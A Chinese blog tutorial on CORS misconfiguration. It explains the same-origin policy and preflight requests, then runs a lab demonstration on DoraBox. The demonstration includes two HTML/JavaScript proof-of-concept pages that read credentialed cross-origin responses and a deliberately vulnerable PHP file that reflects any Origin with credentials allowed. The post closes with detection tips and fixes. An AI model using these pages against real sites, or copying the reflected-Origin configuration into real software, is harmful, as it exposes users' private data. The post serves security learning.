初识CORS跨域资源共享漏洞

前言:


很早之前就想学习了解的一个漏洞,虽然实战中还没遇到过,但并不影响我认识它。

基础了解:


这里先简单介绍下同源策略:

为了保证用户信息的安全,防止恶意的网站窃取数据。不是同源的网站,不能相互读取信息,譬如用户登录A站,同时登录了B站,如果A\B不是同源,那么A不能读取B站的数据

同源策略包括以下三个方面:同端口、同协议、同域名

同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一个子域传递到另一个子域,或者在不同域之间进行传递(例如将访问令牌和会话标识符,传递给另一个应用程序)

默认的配置,或是由于缺乏对此的了解而导致了错误的配置。

CORS是一个W3C标准,全称是"跨域资源共享"(Cross-origin resource sharing)。它允许浏览器向跨源(协议 + 域名 + 端口)服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制。
CORS 需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能,IE 浏览器不能低于 IE10。

CORS 背后的基本思想,就是使用自定义的 HTTP 头部让浏览器与服务器进行沟通,从而决定请求或响应是应该成功,还是应该失败。

漏洞详情:


CORS定义了两种跨域请求:简单请求 和 非简单请求:

  • 简单跨域请求就是使用设定的请求方式请求数据
  • 非简单跨域请求则是在使用设定的请求方式请求数据之前,先发送一个OPTIONS预检请求,验证请求源是否为服务端允许源。只有"预检"通过后才会再发送一次请求用于数据传输

简单跨域请求需同时满足以下两个条件:

  • 请求方法是以下三种方法之一:HEAD、GET、POST
  • HTTP的头信息不超出以下几种字段:
    Accept
    Accept-Language
    Content-Language
    Last-Event-ID
    Content-Type:application/x-www-form-urlencoded、 multipart/form-data、text/plain

简单请求:
浏览器直接发出CORS请求,在头信息中添加一个Origin字段,用来说明请求来自哪个源,服务器根据这个值,决定是否同意这次请求。
如果Origin指定的源在许可范围内,即验证通过,服务端会在Response Header 添加下面几个字段:

  • Access-Control-Allow-Origin:该字段是必须的。它的值要么是请求时Origin字段的值,要么是一个*,表示接受任意域名的请求。
  • Access-Control-Allow-Credentials:该字段可选。它的值是一个布尔值,表示是否允许发送Cookie。默认情况下,Cookie不包括在CORS请求之中。当设置为true时,即表示服务器明确许可,Cookie可以包含在请求中,一起发给服务器。
  • Access-Control-Allow-Headers:用来判断浏览器通过什么方式发起的,默认是content-type,如果后端服务器未配置这个请求头,或者仅允许content-type而浏览器通过XMLHttpRequest发起,也会跨域失败。

如果服务器不许可,服务器也会返回一个正常的HTTP回应,返回的状态码可能为200。返回的信息中不会包含Access-Control-Allow-Origin字段
而浏览器会发现,这个回应的头信息中的Access-Control-Allow-Origin字段不包含访问源,就知道出错了,从而抛出同源检测异常的错误。这个错误不能通过状态码识别,需要onerror捕获

这里以DoraBox靶场演示:
项目地址:https://github.com/Acmesec/DoraBox

修改header中的origin字段,验证是否存在CORS跨域漏洞:

利用POC:

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
 
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
 
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "http://192.168.107.156/DoraBox/csrf/userinfo.php", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
 
</body>
</html>

成功跨域获取敏感信息:

非简单请求:

  • 非简单请求的请求方法是PUT或DELETE,或者Content-Type字段的类型是application/json。
  • 在正式通信之前,会增加一次OPTIONS方法的预检请求。
  • 询问服务器,网页所在域名是否在服务器的许可名单中,以及可以使用那些HTTP动词和头信息字段,只有得到肯定答复,浏览器才会发出正式XMLHTTPRequest请求,否则会报错

浏览器先发送一个OPTIONS方法的预检请求,带有如下字段:

  • Origin: 表明来源域。
  • Access-Control-Request-Method: 表面接下来请求的方法,例如PUT、DELETE等等
  • Access-Control-Request-Headers: 自定义的头部,所有用setRequestHeader方法设置的头部都将会以逗号隔开的形式包含在这个头中

如果服务器配置了CORS,会返回对应对的字段:

  • Access-Control-Allow-Origin: 允许进行跨域请求的域名
  • Access-Control-Allow-Methods: 允许进行跨域请求的方式
  • Access-Control-Allow-Headers: 允许进行跨区请求的头部

如下图所示:

CORS的最后一道防线:
如果一个目标域设置成了允许任意域的跨域请求,这个请求又带着 Cookie 的话,这个请求是不合法的。
也就是说,如果需要实现带 Cookie 的跨域请求,CORS服务端需要明确的配置允许来源的域,使用任意域的配置是不合法的)浏览器会屏蔽掉返回的结果,Javascript 就没法获取返回的数据了。

示例代码如下:

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

当然对于无cookie页面是可以进行CSRF或者CORS攻击,这种情况一般危害就相对小很多了。

如果要把Cookie发到服务器,一方面要服务器同意,指定Access-Control-Allow-Credentials字段。

Access-Control-Allow-Credentials: true

另一方面,开发者必须在AJAX请求中打开withCredentials属性

var xhr = new XMLHttpRequest();
xhr.withCredentials = true;

现实环境中的CORS,几乎都是必定需要cookie的,不需要cookie的CORS的危害度也大大降低。
设置一个需要cookie才能访问的页面:

# cors.php
<?php
setcookie("name","admin");
# header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Origin:'.$_SERVER["HTTP_ORIGIN"]);
header("Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS");
# header("Access-Control-Allow-Credentials: true");
header('Content-Type: application/json; charset=utf-8');
header('Access-Control-Allow-Headers: content-type,x-requested-with');
$id=json_decode(file_get_contents("php://input"),TRUE)['id'];
if (($id == 1) && ($_COOKIE["name"] == "admin")){
echo json_encode(array(
       'id' => 1,
       'name' => 'test',
'iphone' => 13888888888,
'email' => 'test@qq.com'
  ));
}
?>

不携带cookie进行访问,无法获取敏感数据:

利用POC:

// cors_test2.html
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
 
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
 
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  payload = '{"id":"1"}';
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("POST", "http://192.168.107.156/DoraBox/csrf/cors.php", true);
  xhttp.setRequestHeader("Content-type","application/json; charset=utf-8");
  xhttp.withCredentials = true;
  xhttp.send(payload);
}
</script>
 
</body>
</html>

测试的时候发现CORS失效,原因是默认情况下服务器不许可Cookie可以包含在请求中,一起发给服务器。

我们将cors.php对应注释的部分去掉即可:

漏洞代码:
1、一般如下配置是最危险的,可以携带cookie进行CORS攻击

header('Access-Control-Allow-Origin:'.$_SERVER["HTTP_ORIGIN"]);
header("Access-Control-Allow-Credentials: true");

2、这种情况下,无cookie页面可以进行CORS攻击。

header('Access-Control-Allow-Origin: *')

补充说明:

  • 同域的请求会自动带上Cookie
  • Origin为空,表示是同域或直接访问,视为安全情况。做安全限制需要注意空Origin,不要一起限制了
  • 后端设置Access-Control-Allow-Credentials为true,表示跨域请求后端接口时,允许带上Cookie。此时,前端必须设置withCredentials为true。**同时,由于Cookie本身也受同源策略限制,所以Cookie要实现跨域,还需要满足:
  1. 相同的一级域名(比如joychou.org)
  2. Cookie的domain设置为.joychou.org

漏洞检测:

一般在burp中增加Origin: https://test.com,观察服务器采用了哪种配置。如果使用的是白名单,也有可能是使用了正则白名单,有可能存在绕过的方式。

修复方案:

1、严格效验来自请求数据包中的“Origin”的值。当收到跨域请求的时候,要检查“Origin” 的值是否是一个可信的源,还要检查是否为null
2、避免使用 “Access-Control-Allow-Credentials :true” (请求中带cookie)
3、减少“Access-Control-Allow-Methods”所允许的方法(只需要配置你所需要的即可)

参考如下:


CSRF-CORS-JSONP
CORS跨域资源共享漏洞
跨域CORS、JSONP原理及漏洞的利用
CORS · JoyChou93/java-sec-code Wiki
Web业务安全测试—CORS跨域资源共享漏洞
《网络安全学习》 第七部分-----跨域资源共享(CORS)漏洞

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,723评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,003评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,512评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,825评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,874评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,841评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,812评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,582评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,033评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,309评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,450评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,158评论 5 341
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,789评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,409评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,609评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,440评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,357评论 2 352

推荐阅读更多精彩内容